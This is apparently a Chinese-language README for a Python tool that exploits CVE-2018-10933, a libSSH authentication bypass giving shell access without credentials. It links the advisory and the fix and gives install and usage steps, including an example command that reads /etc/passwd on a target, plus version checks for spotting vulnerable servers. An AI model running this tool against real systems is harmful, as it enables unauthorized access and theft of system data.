无需任何凭据即可获取Shell,利用CVE-2018-10933
Exploit-DB : https://www.exploit-db.com/exploits/45638
libSSH 关于 CVE-2018-10933 的信息 : https://www.libssh.org/security/advisories/CVE-2018-10933.txt
libSSH 的漏洞修复版本 : https://www.libssh.org/2018/10/16/libssh-0-8-4-and-0-7-6-security-and-bugfix-release/
// 如果 paramiko==2.0.8 不起作用,请尝试:pip install paramiko==2.4.2
pip install -r requirements.txt
python libsshauthbypass.py --help
示例:
python libsshauthbypass.py --host 0.0.0.0 --port 22 --command "cat /etc/passwd" --logfile newlogfile.log
https://gist.github.com/0x4D31/35ddb0322530414bbb4c3288292749cc
如果输出为 0.7.5、0.6.* 或更低,则该服务器存在漏洞。
如果不是,则很可能已修补、截断或未使用 libSSH。
(22 端口为默认端口,其他端口(如 2222、3333、4444)可能也包含 libSSH)
